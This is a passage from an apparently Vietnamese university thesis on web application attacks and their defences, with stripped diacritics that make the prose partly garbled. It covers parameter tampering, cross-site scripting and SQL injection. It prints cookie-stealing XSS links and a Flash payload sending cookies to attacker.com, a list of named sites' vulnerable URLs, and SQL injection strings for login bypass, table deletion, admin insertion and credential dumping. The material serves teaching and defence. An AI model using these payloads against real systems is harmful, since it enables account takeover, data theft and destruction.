ngun mt trang Web hay tp tin cha mt khu ca ngi dng trn h thng lun l

mc tiu ca hacker. Ngoi ra nhng li ch thch trong m ngun cng l ngun

thng tin hu ch cho hacker.

Hacker s dng tr li HTTP t h thng xc nh mt tp tin hay ng dng ctn ti hay khng.

V d 1.IV-1:

HTTP 200 : tp tin tn ti

HTTP 404: tp tin khng tn ti.

V.TCHI DCH V (Denial of service (DoS)

Mt khi lng ln yu cu c gi cho ng dng trong mt khong thi gian nht

nh khin h thng khng p ng kp yu cu dn n h thng b ph v.

V khun kh v thi gian ca lun vn l c hn nn lun vn ch thc hin tm hiu

mt s kthut ph bin v kh nng ph hoi mt h thng mng vi mc cao. V

trong cc chng phn th hai, lun vn s trnh by khn tng kthut sau :

Thao tc trn tham s truyn

Chn m lnh thc thi trn trnh duyt

Chn cu truy vn SQL

Chim hu phin lm vic


35/169

Khoa CNTT


-Trang 32-

Trn b m

T chi dch v

Mt vi kthut khc

o K t rng

o M ha URL

o Li dng truy xut ng dn n mt tp tin

o Ngn ngpha trnh ch


36/169

Khoa CNTT

Phn II: Cc kthut tn cng v bo mtng dng Web

-Trang 33-

PHN THHAI

CC K THUT TN CNG VBO MT NG DNG WEB


37/169

Khoa CNTT

Chng 4: Thao tc trn tham struyn

-Trang 34-

Chng 4

THAO TC TRN THAM S TRUYN

Ni dung:I. Thao tc trn URL

II. Thao tc trong bin n form

III. Thao tc trn cookie

IV. Thao tc trong HTTP Header


38/169

Khoa CNTT


-Trang 35-

CHNG 4:THAO TC TRN THAM S TRUYN

Thao tc trn tham s truyn l kthut thay i thng tin quan trng trn cookie, URL

hay bin n ca form. Kthut Cross-Site Scripting, SessionID, SQL Injection, Buffer

Overflowcng cn dng n cc tham s ny hon thin cc bc tn cng ca

hacker. C th ni cc tham s truyn l u mi cho mi hot ng ca hacker trong

qu trnh tn cng ng dng. V thy l ni dung chng u tin c cp trong

phn th hai, mc ch cng l h trtt hn phn trnh by cc chng k tip.

I. THAO TC TRN URL

I.1. Khi nim:

Khi nhp mt form HTML th kt qu sc gi i theo hai cch: GET hay

POST. Nu dng GET, th tt c cc tn bin v gi tr ca n s xut hin trong

chui URL.

V d 4.I.1-1: C mt trang web ng dng cho php thnh vin c thay i

mt khu.

http://www.nganhang.com/example?user=thang&newpass=123

Vi:

+ username l tn ngi cn thay i mt khu.

+ newpass l mt khu mi cho username

Tuy nhin, bng cch thay i tham s nh sau:


39/169

Khoa CNTT


-Trang 36-

http://www.nganhang.com/example?user=admin&newpass=111111

Hacker c th thay i mt khu ca admin bng mt mt khu mi bt k,

trong v d ny l 1111111

I.2. Mt s bin php khc phc

chng li kiu thay i ni dung mt chui URL, ng dng c th p dng

bin php sau:

ng dng s dng cch bng bm (hash table). Sau khi ngi dng chng

thc thnh cng vi mt username , ng dng s sinh ra mt kho tng ng.

Kho ny s c lu trn server cng vi bin username trong i tng

bng bm. Mi khi ngi dng kt ni n ng dng, kho v username ny

sc gi i v c so snh vi kho v username trong bng bm. Nu

tng ng vi bn ghi trong d liu th hp l. Cn nu khng th server bit

rng ngi dng thay i URL.

Ngoi ra, vi nhng thng tin c gi tr, cn m ho thng tin ny trc khi

cho hin th trn trnh duyt trnh hacker c th sa i ty .

II. THAO TC TRN BIN N FORM

II.1. Khi nim

Thng tin c thc chuyn i thng qua mt bin n ca form, gi l Hidden

Form Field. Bin n form khng hin th trn mn hnh trnh duyt nhng ngi

dng c th tm thy ni dung ca n trong view source , v thy l mt

im yu hacker li dng bng cch lu ni dung trang web xung trnh duyt,

thay i ni dung trang v gi n trnh ch.


40/169

Khoa CNTT


-Trang 37-

V d 4.II.1-1: Form gc c ni dung nh sau:

...

...

Nu khng c s thay i no th yu cu n trnh ch c ni dung :

POST /cuahang.pl HTTP/1.0

...

giaca=99.99

Nhng nu hacker gn mt gi tr khc cho trng giaca :

...

...

th yu cu s thay i:

POST /cuahang.pl HTTP/1.0

...

giaca=0.99

Ngoi vic thay i ni dung bin n ca form, hacker cn bin i ni dung cc

thnh phn trong form, nh chiu di ca mt nhp d liu thc hin vic tn

cng BUFFER OVERFLOW,


41/169

Khoa CNTT


-Trang 38-

II.2. Mt s bin php khc phc

Ch nn s dng bin n ca form hin th d liu trn trnh duyt, khng

c s dng gi tr ca bin thao tc trong x l ng dng.

Dng bin HTTP_REFERER kim tra ngun gc ca yu cu gi n, tuy

nhin hacker c th s dng Proxy che du ngun gc thc ca n, v vy

cng khng nn qu tin tng bin HTTP_REFERER kim tra.

Ghp tn v gi tr ca bin n thnh mt chui n. S dng thut ton m

ho MD5 hoc mt kiu hash mt chiu khc tng hp chui v lu nvo mt hidden field gi l Chui mu.

Khi gi tr trong form c gi i, cc thao tc nh trn c thc hin li vi

cng mt kho m ta nh trc. Sau em so snh vi Chui mu, nu

chng khng khp nhau th chng t gi tr trong biu mu b thay i.

Dng mt sessionID tham chiu n thng tin c lu tr trn csd

liu.


42/169

Khoa CNTT


-Trang 39-

III. THAO TC TRN COOKIE

III.1. Khi nim

phn th nht, chng 2, mc IV, lun vn trnh by cbn khi nim v

cookie. Trong mc ny, lun vn ch trnh by cch thay i mt cookie.

V cookie l thnh phn lu tr thng tin bo mt nht nn Cookie thng c

dng lu gi trng thi cho giao thc HTTP hn l bin n form v bin URL.

N cn c dng lu tr nhng thng tin ca ngi dng khi s dng ng

dng v nhng d liu khc ca session. Tt c cc loi cookie nh persistent haynon-persistent, secure hay insecure u c th b thay i bi ngi dng v c

gi v cho trnh ch. Do hacker c th thay i ni dung cookie ph hoi

ng dng.

Vi nhng cng c min ph nh Winhex th non-persistent cookie c th b thay

i ni dung. Cn SSL ch c th bo v cookie trong qu trnh truyn.

V d 4.III.1-1: v cookie dng lu tr thng tin cho ng dng web thng tin

du lch:

Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;

Cookie xc nh ngi dng ny khng phi l Admin (ADMIN=no), nhng nu

hacker thay i trng ny iu g s xy ra? Hacker c th thay i li thnh nh

sau:Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;

Hacker lc ny mang vai tr l mt ngi qun tr ca ng dng.


43/169

Khoa CNTT


-Trang 40-

III.2. Mt s bin php khc phc

S dng i tng session lu tr thng tin quan trng trn trnh ch. Khi ng

dng cn kim tra thng tin ca mt ngi dng, ng dng s dng sessionIDca ngi dng chn thng tin ca ngi dng trong cache hay cs

d liu.

Xy dng mt c ch kim tra ni dung ca cookie tm ra nhng gi tr

khng hp l t bit c cookie l gi. V d l nu bin cngi

qun tr c c thit lp l ng trong cookie, nhng gi tr ca s th t

ngi dng trong cookie li khng ging nh gi tr s th t ca ngi quntr c lu tr trn server.

Phng php cui cng l m ho cookie. C mt s phng php m ho

nh symmetric (dng 1 kha duy nht cho c m ha v gii m) hay

asymmetric (m ha dng 2 kha ring bit, mt kha dng chung cho m ha

v mt kha ring gii m)

IV. THAO TC TRONG HTTP HEADER

URL, bin n form, cookie u l nhng thnh phn lu tr thng tin m ngi dng

thng thng c th xem v thay i. Tuy nhin, nhng thnh phn u c

chuyn i thng qua HTTP Header. V th, mc d HTTP Header khng phi l tham

s truyn ca mt ng dng nhng mi thng tin u c lu tr vo n trc khi

chuyn i nn trong phn ny s cp n vic thay i mt HTTP Header.

IV.1. Khi nim

Thng thng ch c trnh duyt v trnh ch l trao i HTTP Header ( xem chi

tit trong phn th nht, chng 2, mc II), cn hu ht cc ng dng web th


44/169

Khoa CNTT


-Trang 41-

khng. Tuy nhin, hacker c th t vit mt chng trnh iu khin HTTP

header (nh xem ni dung, to mi) hay s dng cc proxy min ph cho php

thay i d liu c gi t trnh duyt. Ngoi ra hacker c th tn cng trc tip

bng cch telnet gi HTTP Request n trnh ch.

V d 4.IV.1-1:

su-2.05# telnet localhost 80

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

GET / HTTP/1.0Referer: www.redhat.com/login.asp

User-Agent:

HTTP/1.1 200 OK

Date: Mon, 17 Dec 2001 20:39:02 GMT

Server:

Connection: close

Content-Type: text/html

Phn in m l ni dung hacker thay i.

V d 4.IV.1-2:

Referer header cha URL ca trang web m t yu cu c gi i. V th

mt vi ng dng s kim tra thnh phn ny trong headerm bo rng n

c gi t trang web ca ng dng . Vic lm ny dng ngn chn vic

hacker lu li trang web xung my, chnh sa thuc tnh form, ph hoi bngcch nhm vo client side validate hay server side include, sau gi i. Nhng

phng php kim tra ny s tht bi khi hacker c th sa li Referer header

n ging nhc gi t trang web hp l.


45/169

Khoa CNTT


-Trang 42-

Referer: www.redhat.com/login.asp

IV.2. Mt s bin php khc phc

n gin l khng tin tng vo HTTP header nu cha c cc bin php an ton.

Vi cc header gi t trnh ch, chng hn nh cookie th c thc m ho.

Cn vi cc header gi t trnh khch th khng nn dng cc tham s nh

referer, thc hin cc bin php an ton.

Nhn xt:

Mi thng tin quan trng trao i gia trnh duyt v trnh ch khng nn lu tr

di dng chui thng thng m cn c m ha, ngoi ra nhng thng tin ny

nn c kim tra, i chiu vi d liu trong csd liu hay trong cache ca trnh

ch, phng trnh trng hp ni dung thng tin b sai lch.

Bn cnh , vic kim tra d liu ng n l cn thit v hu nh cc k thut tn

cng u da vo d liu nhp trn URL, bin n form hay cookie nh kiu tn cng

Cross-Site Scripting trong chng k tip hay SQL Injection trong chng 6


46/169

Khoa CNTT

Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)

-Trang 43-

Chng 5

CHN M LNH THC THI TRN

TRNH DUYT NN NHNNi dung:

I. Cross Site Scripting (XSS)

II. Phng php tn cng XSS truyn thng.

III. Mt s WebSite tm thy l hng XSS.

IV. Tn cng XSS bng Flash.

V. Cch phng chng.


47/169

Khoa CNTT


-Trang 44-

CHNG 5:

CHN M LNH THC THI TRN TRNH DUYT

NN NHN (CROSS SITE SCRIPTING)

I. K THUT TN CNG CROSS SITE SCRIPTING (XSS)

Phng php Cross Site Scripting (c vit tt l XSS) l phng php tn cng

bng cch chn thm nhng on m c kh nng nh cp hay thit lp c nhngthng tin quan trng nh cookies, mt khu, vo m ngun ng dng web t

chng c chy nh l mt phn ca ng dng Web v c chc nng cung cp hoc

thc hin nhng nhng iu hacker mun.

Phng php ny khng nhm vo my ch h thng m ch yu tn cng trn chnh

my ngi s dng. Hacker s li dng s kim tra lng lo tng dng v hiu bit

hn ch ca ngi dng cng nh bit nh vo s t m ca h dn n ngi dngb mt thng tin mt cch d dng.

Thng thng hacker li dng a ch URL a ra nhng lin kt l tc nhn kch

hot nhng on chng trnh c vit bng ngn ng my khch nh VBScript,

JavaScriptc thc thi trn chnh trnh duyt ca nn nhn.

V D 5.I-1:http://hotwired.lycos.com/webmonkey/00/index1.html?tw=alert

(document.cookie);


48/169

Khoa CNTT


-Trang 45-

hay:

http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_te

xt=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

Phn in m l on m c thm vo vi mc ch nh cp cookies ca nn nhn.

Trong nhng v d 2.I-1 trn, hu ht nhng tin t URL l a ch ca nhng ng

dng Web c tht (VD: http://www.microsoft.com/education,

http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/...) li dng cch truyn tham s

trn URL m hacker c th d dng thm vo on m nh cp cookie.

V d 5.I-1 trn ch minh ha mt cch n gin l thm on m ca mnh vo trang

Web thng qua URL. Nhng thc s th c rt nhiu cch thm on m

JavaScript vi mc ch tn cng kiu XSS. Hacker c th d dng li dng

Document Object Model (DOM) thay i ng cnh v ni dng Web ng dng.

Sau y l danh sch ni c th chn on m:

V d 5.I-2:

&[code]

&{[code]};


49/169

Khoa CNTT


-Trang 46-

[code]

[code]

[code];

(ti liu t http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0)

Phn in m l phn c tht on m nh cp thng tin.

II. PHNG PHP TN CNG XSS TRUYN THNGng dng Web thng lu tr thng tin quan trng cookie. Cookie l mu thng

tin m ng dng lu trn a cng ca ngi s dng. Nhng chng dng thit lp

ra cookie th mi c thc n. Do ch khi ngi dng ang trong phin lm vic

ca ng dng th hacker mi c c hi nh c p cookie. Cng vic u tin ca

hacker l tm trang ch d ngi dng ng nhp sau khi tm ra l hng trn

ng dng .

Cc bc thc hin XSS truyn thng:


50/169

Khoa CNTT


-Trang 47-

Hnh 5.II-1. Qu trnh thc hin XSS

Tm tt cc bc thc hin:

Bc 1: Hacker bit c ngi dng ang s dng mt ng dng Web c l

hng XSS.

Bc 2: Ngi dng nhn c 1 lin kt thng qua email hay trn chnh trang

Web (nh trn guestbook, banner d dng thm 1 lin kt do chnh hacker to

ra). Thng thng hacker khin ngi dng ch bng nhng cu kch thch

s t m ca ngi dng nh Kim tra ti khon, Mt phn thng hp dn

ang chbn

Bc 3: Chuyn ni dung thng tin (cookie, tn, mt khu) v my ch ca

hacker.

Bc 4: Hacker to mt chng trnh cgi ( v d 3 ny l steal.cgi) hoc mt

trang Web ghi nhn nhng thng tin nh cp vo 1 tp tin

Bc 5: Sau khi nhn c thng tin cn thit, hacker c th s dng thm

nhp vo ti khon ca ngi dng.


51/169

Khoa CNTT


-Trang 48-

V d 5.II-1: khai thc l hng trn ng dng hotwired.lycos.com, hacker c th

thc hin nh sau :

Look at this!

Mt phn thng hp dn ang chbn

Sau khi ngi dng nhp vo lin kt Mt phn thng hp dn ang chbn,

cookie trn my nn nhn s bnh cp v l tham s truyn vo cho chng trnh

steal.cgi ca hacker.

http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C

20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286

Vn t ra l c th ngi lp trnh s bo vng dng Web ca mnh bng cch

lc nhng k tc bit nh , hay + (c th trnh trng hp dng du thc hin

cu truy vn SQL chng hn) Nhng hacker c th li dng m hex thay cho

nhng k t c bit tn cng.

Thay th bng nhng s hex cho nhng k t ASCII.

V d 5.II-2:


52/169

Khoa CNTT


-Trang 49-

http://www.attacker.com/steal.cgi:

h -> 0x0068

t -> 0x0074

t -> 0x0074

p -> 0x0070

: -> 0x003A

/ -> 0x002F

Sau y l v d trong cch dng m hex trong ng dng web.

V d 5.II-3:

Look at this!


53/169

Khoa CNTT


-Trang 50-

u %2B= String.fromCharCode(0x0063);u %2B=

String.fromCharCode(0x006B);


String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x002E);u %2B=

String.fromCharCode(0x0063);

u %2B= String.fromCharCode(0x006F);u %2B=

String.fromCharCode(0x006D);

u %2B= String.fromCharCode(0x002F);u %2B=



String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0061);u %2B=

String.fromCharCode(0x006C);

u %2B= String.fromCharCode(0x002E);u %2B=




u %2B= String.fromCharCode(0x003F);

u %2B=document.cookie;document.location.replace(u);"

onMouseOver="window.status=http://www.hotwired.lycos.com/index2.ht

ml';return true"

onMouseOut="window.status='';return true">Mt phn thng hp dn ang ch

bn

III.MT S WEBSITE TM THY L HNG XSS

Tn cng ty Domain Nhng lin kt b khai thc

NBC http://www.shop http://www.shopnbc.com/listing.asp?qu=


54/169

Khoa CNTT


-Trang 51-

nbc.com alert(document.cookie)&frompa

ge=4

&page=1&ct=VVTV&mh=0&sh=0&RN=1

Microsoft http://www.micr

osoft.com/

http://www.microsoft.com/education/?ID=MCTN

&target=http://www.microsoft.com/education/?ID=

MCTN

&target=alert(document.cookie)

Chase https://www.cha

se.com/

https://www.chase.com/chase/gx.cgi/FTcs?pagenam

e=alert(document.cookie)

&urlname=smallbusiness/direct

EBay https://scgi.ebay.

co.uk/

https://scgi.ebay.co.uk/saw-

cgi/eBayISAPI.dll?SSLRegisterShow

&countryid=3&siteId=3&co_partnerId=0&UsingSS

L=1

&aolemail=alert(document.cookie)

Oracle Japan http://www.oracle.co.jp/

http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?

search_text=alert(document.cookie)

IV. TN CNG XSS BNG FLASH

Ngoi nhng cch a mt on m nguy him th hacker cn c th li dng nhngtp tin flash nh cp thng tin.


55/169

Khoa CNTT


-Trang 52-

Macromedia Flash cho php lp trnh bng mt ngn ng kch bn c xy dng

sn trong Flash l ActionScript. ActionScript c c php n gin v tng t nh

JavaScript, C hay PERL. V d hm getURL() dng gi mt trang web khc, tham

s thng l mt URL chng hn nh http://www.yahoo.com.

V d 5.IV-1:

getURL(http://www.yahoo.com)

Tuy nhin c th thay th URL bng JavaScript:

getURL(javascript:alert(document.cookie))

V d 5.IV-1 trn s lm xut hin bng thng bo cha cookie ca trang web cha

tp tin flash . Nh vy l trang web b tn cng, bng cch chn mt on

JavaScript vo ng dng Web thng qua tp tin flash. Mt v d khc r hn v cch

tn cng ny l:

y l on lnh trong tp tin flash v s c thi hnh khi tp tin flash c c:

getURL(javascript:location(http://www.attacker.com?newcookie=+do

cument.cookie))

Nh vy l khi ngi dng xem trang web cha tp tin flash ny th ngay lp tc

cookie ca h do trang web cha tp tin flash to ra s gi v cho hacker.


56/169

Khoa CNTT


-Trang 53-

Hnh 5.IV-2: Cch vit Action Scipt trong Flash

V d 5.IV-2:

DeviantArt l mt trang web ni ting, cho php thnh vin ca n gi cc tp tin

flash ln cho mi thnh vin cng xem. V th hacker c thn cp cookie ca cc

thnh vin v cng c th l ti khon ca ngi qun tr web, bng cch ng k lm

thnh vin ca ng dng Web ny, gi tp tin flash ln my ch v i cc nn nhn

xem tp tin flash . Di y l a ch lin kt dn mt tp tin flash nh trnh

by trong v d 5.IV-2:

http://www.deviantart.com/deviation/1386080

Ngoi ra cc trang web cho php thnh vin gi d liu dng HTML nh din n,

cc chc nng to ch k ring, cng c th l mc tiu ca cch tn cng ny,

bng cch nhp on m gi tp tin flash vo.


57/169

Khoa CNTT


-Trang 54-

HEIGHT="48"

id="1"

ALIGN="">

V. CCH PHNG CHNG

Vi nhng d liu, thng tin nhp ca ngi dng, ngi thit k ng dng Web

cn phi thc hin vi bc cbn sau:

o To ra danh sch nhng th HTML c php s dng.

o Xa b th

o Lc ra bt k mt on m JavaScript/Java/VBScript/ActiveX/Flash Related

no.

o Lc du nhy n hay kpo Lc k t Null ( v kh nng thm mt on m bt k sau k t Null khin cho

ng dng d lc b th vn khng nhn ra do ng dng nghrng

chui kt thc t k t Null ny).


58/169

Khoa CNTT


-Trang 55-

o Xa nhng k t > , <

o Vn cho php nhp nhng k tc bit nhng sc m ha theo chun

ring.

i vi ngi dng, cn cu hnh li trnh duyt nhc nhngi dng c cho

thc thi ngn ng kch bn trn my ca h hay khng? Ty vo mc tin cy

m ngi dng s quyt nh.

Nhn xt:

Kthut XSS kh phbin v d dng p dng, tuy nhin mc thit hi ch dng

li mc tn cng trn my nn nhn thng qua nhng lin kt hay form la om hackera n cho nn nhn. V th, ngoi vic ng dng kim tra tnh ng n

ca d liu trc khi s dng th vic cn nht l ngi dng nn cnh gic trc khi

bc vo mt trang Web mi. C th ni, nhvo s cnh gic ca ngi dng th

90% t c s bo mt trong k thut ny. Tuy nhin, trong chng 6, s tn

cng li nhm vo my ch, nhm thu thp thng tin trong c s d liu v t

ginh quyn qun tr ng dng.


59/169

Khoa CNTT

Chng 6: Chn cu truy vn SQL (SQL Injection)

-Trang 56-

Chng 6

CHN CU TRUY VN SQL

Ni dung:I. Khi nim SQL Injection

II. Gii thiu m hnh csd liu.

III. Cc cch tn cng.

IV. Cch phng chng .


60/169

Khoa CNTT


-Trang 57-

CHNG 6:

CHN CU TRUY VN SQL (SQL INJECTION)

I. KHI NIM SQL INJECTION

SQL Injection l cch li dng nhng l hng trong qu trnh lp trnh Web v phn

truy xut csd liu. y khng ch l khuyt im ca ring SQL Server m n

cn l vn chung cho ton b cc csd liu khc nh Oracle, MS Access hay

IBM DB2.

Khi hacker gi nhng d liu (thng qua cc form), ng dng Web s thc hin v

tr v cho trnh duyt kt qu cu truy vn hay nhng thng bo li c lin quan n

c sd liu. V nhnhng thng tin ny m hacker bit c ni dung csd

liu v t c thiu khin ton b h thng ng dng.

II. GII THIU M HNH CSDLIU trnh by tt hn ni dung kthut ny, lun vn s dng bng User minh ha

kthut tn cng.

Bng User:

STT Tn trng Ci t vt

l

Kiu

trng

Kch

thc

Din gii

1 tkUsername Kha chnh Text 50 i ngi dng c 1

account ng nhp.

2 tkPassword Text 50 assword ng

hp


61/169

Khoa CNTT


-Trang 58-

Quy c:

Ngn ng lp trnh s dng minh ha trong chng ny l ASP vi csd liu

l SQL Server.

III. CC CCH TN CNG

III.1. Kthut tn cng SQL Injection

Di y l k thut SQL injection n gin nht, dng vt qua cc form

ng nhp.

V d 6.III.1-1: gi sng dng web c on m sau:

SQLQuery= SELECT tkUsername FROM User WHERE tkUsername= &

strUsername & AND Password= & tkPassword &

flag= GetQueryResult (SQLQuery)

if flag = then

check=FALSE

else

check=TRUE

end if

on m trn kim tra chui nhp Username v Password. Nu tn ti trong bng

User th check=true ngc li check=false.

Gi tri nhp vo l:Username: OR =

Password: OR =


62/169

Khoa CNTT


-Trang 59-

Cu lnh SQL lc ny nh sau:

SELECT tkUsername FROM User WHERE tkUsername= OR = AND

Password= OR =

Cu lnh so snh trn lun lun ng (v lun bng ). Do cu iu kin

trong mnh WHERE lun ng. Gi tr tn ngi s dng ca dng u tin

trong bng sc chn.

Kt hp vi k tc bit ca SQL :

k t ; : nh du kt thc 1 cu truy vn

k t -- : n chui k t pha sau n trn cng 1 dng

V d 6.III.1-2:

Username: ; drop table User--

Password:

Cu lnh SQL lc ny nh sau:

SELECT tkUsername FROM User WHERE tkUsername= ;drop table

User-- AND Password= & tkPassword &

Vi cu lnh trn th bng User s b xa hon ton.

V d 6.III.1-3: Mt v d khc s dng k tc bit SQL thm nhp vo h

thng nh sau:Username: admin--

Password:


63/169

Khoa CNTT


-Trang 60-

Cu lnh SQL nh sau:

SELECT tkUsername FROM User WHERE tkUsername= admin-- AND

Password= & tkPassword &

Cu lnh trn cho php ng nhp vo h thng vi quyn admin m khng i

hi password.

III.2. Tn cng da vo cu lnh SELECT

Ngoi k thut n gin trn, vic tn cng thng da trn nhng thng bo li

ly thng tin v bng cng nh nhng trng trong bng. lm c iu

ny, cn phi hiu nhng thng bo li v t chnh sa ni dung nhp cho ph

hp.

Khi nim Direct Injection:

Nhng i sc thm vo trong cu lnh m khng nm gia nhng du nhy

n hay du ngoc kp l trng hp direct injection. V d III.2.1

V d 6.III.2-1:

StrSQL=SELECT tkUsername FROM User WHERE tkUsername=& tName

Khi nim Quote Injection:

Nhng trng hp i sc nhp vo u c ng dng cho vo gia hai du

nhy n hay ngoc kp l trng hp Quote Injection. V d III.2.2

V d 6.III.2-2:

StrSQL=SELECT tkUsername FROM User WHERE tkUsername=& tName &


64/169

Khoa CNTT


-Trang 61-

v hiu ho du nhy v thay i cu lnh m vn gic c php ng,

chui m chn thm vo phi c mt du nhy n trc chui k tc chn

vo v cui cu lnh phi c mt du nhy n, chng hn nh sau:

StrSQL=SELECT tkUsername FROM User WHERE tkUsername= and

=

Nu thc hin nh trn m thng bo li c lin quan n du ( th trong

chui chn vo phi c ):

V d 6.III.2-3: Gi s:

StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=& tName

& )

Th c php hp l nh sau:

StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=)or

=

Ngoi ra k t % thng c dng trong nhng trng hp tm kim thng

tin.

V d 6.III.2-4:

StrSQL=SELECT tkUsername FROM User WHERE tkUsername like % &

tName &


65/169

Khoa CNTT


-Trang 62-

III.3. Tn cng da vo cu lnh HAVING

HAVING s dng cng chung vi mnh GROUP BY l phng php hu

hiu nhn thng tin bng, trng v sc bn su hn trong phn 4.

III.4. Tn cng da vo cu lnh kt hp UNION

Lnh SELECT c dng ly thng tin t csd liu. Thng thng v tr

c thc chn thm vo mt mnh SELECT l sau WHERE. c th tr

v nhiu dng thng tin trong bng, thay i iu kin trong mnh WHERE

bng cch chn thm UNION SELECT.

V d 6.III.4-1:

StrSQL=SELECT tkUsername FROM User WHERE tkUsername like % &

tName & UNION SELECT tkPassword from User

Cu lnh trn tr v mt tp kt qu l s kt h p gia tkUsername vi

tkPassword trong bng User.

Ghi ch:

S ct trong hai cu SELECT phi khp vi nhau. Ngha l s lng ct

trong cu lnh SELECT ban u v cu lnh UNION SELECT pha sau bng

nhau v cng kiu.

Nh vo li c php tr v sau khi chn thm cu lnh UNION m c th bit

kiu ca mi trng.


66/169

Khoa CNTT


-Trang 63-

Sau y l nhng v dc thc hin khi khng bit ni dung csd liu da

vo HAVING, GROUP BY, UNION:

V d 6.III.4-2: Nhc li cu truy vn cn ng nhp:

SQLQuery= SELECT tkUsername,tkPassword FROM User WHERE

tkUsername= & strUsername & AND Password= & tkPassword

&

u tin, bit tn bng v tn trng m cu truy vn s dng, s dng cu

iu kin having , nh v d sau:

Gi tr nhp vo:

Username: having 1=1--

Li pht sinh:

[Microsoft][ODBC SQL Server Driver][SQL Server]Column

'User.tkUsername' is invalid in the select list because it is

not contained in an aggregate function and there is no GROUP BYclause.

Nhvo li pht sinh ny m bit c bng s dng trong cu truy vn l User

v trong bng tn ti mt trng tn l tkUsername.

Sau s dng GROUP BY:

V d 6.III.4-3:

Username: group by User.tkUsername having 1=1--


67/169

Khoa CNTT


-Trang 64-

Li pht sinh:

[Microsoft][ODBC SQL Server Driver][SQL Server]

Column'User.tkPassword'is invalid in the select list because it

is not contained in either an aggregate function or the GROUP BY

clause.

Nh vy tkPassword l mt trng ca bng User v c s dng trong cu truy

vn.

Tip tc dng GROUP BY cho n khi bit c tt c cc trng trong bng

User tham gia vo cu truy vn.Khi khng cn bo li c php GROUP BY na th chuyn qua cng on kim

tra kiu ca tng trng trong bng. Lc ny UNION c s dng:

V d 6.III.4-4:

Username:union select sum(tkUsername) from User

Lnh sum l lnh tnh tng cho i s bn trong du ngoc. i sphi l kiu s.Nu i s khng l kiu s th pht sinh li nh sau:

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or

average aggregate operation cannot take a varchar data type as

an argument.

Nh vy vi thng ip li nh trn th tkUsername chc chn phi l kiuvarchar.


68/169

Khoa CNTT


-Trang 65-

Vi phng php trn, d dng xc nh c kiu ca tng trng trong bng.

Sau khi nhn y trng tin trn th hacker d dng t thm thng tin vo

bng User.

V d 6.III.4-5:

Username:; insert into User(tkUsername,tkPassword) values

(admin, )--

Hacker thm ni dung nh V d 6.III.4.2.4 by gitrthnh ngi qun tr mng

m khng cn mt khu chng thc.

V d 6.III.4-6: minh ho mt cng on s gip hackerc ht thng tin trong

bng User:

Bc 1: To mt Stored procedure chp vo tt c thng tin ca 2 trng

tkUsername v tkPassword trong bng User thnh mt chui vo mt bng

mi l foo c mt trng l ret bng on m sau:

create proc test

as

begin

declare @ret varchar(8000)

set @ret=':'

select @ret=@ret+' '+tkUsername+'/'+tkPassword from User

select @ret as ret into foo

end

Thc thi cu lnh bng cch nhp vo form.

Username:;Create proc test as begin declare @ret

varchar(8000) set @ret=: select @ret=@ret+'


69/169

Khoa CNTT


-Trang 66-

'+tkUsername+'/'+tkPassword from User select @ret as ret into

foo

Bc 2: Gi Stored procedure

Sau khi to c stored procedure nh trn, thc hin li gi hm:

Username:;exec test

Bc 3: Dng UNION xem ni dung bng foo

Username:;select ret,1 from foo union select 1,1 from foo

Li pht sinh:

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07'[Microsoft][ODBC SQL Server Driver][SQL

Server]Syntax error convertingthe varchar value ':

admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu'

to a column of data type int.

Qua mt s cng on, hacker thu c ni dung ca bng User gm c tn

tkUsername v mt khu tkPassword.

Bc 4: Ngoi ra hacker cn c th cn thn xo bng foo xo du vt:

Username: ; drop table foo--

V d 6.III.4-7: Cn y l mt cch khc xc nh ni dung ca bng User,

cn mt phng php tm kim thng tin nh sau: Bc 1:

Tm tun t tng dng trn bng User

Username:union select 1,1


70/169

Khoa CNTT


-Trang 67-

hoc :

Username:union select min(tkUsername),1 from User where

tkUsername> a--

Li pht sinh:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error

converting the varchar value 'admin' to a column of data type

int.

Ngi u tin trong bng User l admin.

Bc 2:

bit cc gi tr tip theo, nhp chui sau:

Username:;select min(tkUsername),1 from User where

tkUsername> adminunion select 1,1 from User

Li pht sinh:



converting

the varchar value 'nhimmap' to a column of data type int.

Bc 3:

Thc hin nh bc 2 cho ra kt qu l tng dng vi trng tkUsername

trong bng User.


71/169

Khoa CNTT


-Trang 68-

Bc 4:

bit thm v tkPasswork, c th thc hin nh sau:

Username:;select tkPassword,1 from User where tkUsername=

adminunion select 1,1 from User

Li pht sinh:



converting

the varchar value 'passOfAdmin' to a column of data type int.

bit thng tin v cc bng, ct trong csd liu, c th truy vn bng n

bng h thng INFORMATION_SCHEMA.TABLES.

V d 6.III.4-8:

select TABLE_NAME from INFORMATION_SCHEMA.TABLES

INFORMATION_SCHEMA.TABLES cha thng tin v tt c cc table c trn

server. Trng TABLE_NAME cha tn ca mi table trong csd liu.

SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE

TABLE_NAME='User'

Cu lnh trn c s dng bit thng tin v ct trong bng.

Ngoi ra cn c th dng UNION bit cc bin mi trng ca SQL Server.


72/169

Khoa CNTT


-Trang 69-

V d 6.III.4-9: bit ng dng ang chy trn Server no, c th xc nh bng

cch sau:

Username:;select @@SERVERNAME union select 1

Li pht sinh:

Microsoft OLE DB Provider for ODBC Drivers error

'80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax

error converting the varchar value 'KHOAI_NGU' to a column of

data type int.

III.5. Tn cng da vo lnh INSERT

T kho INSERT dng a thng tin vo c s d liu. Thng thng cu

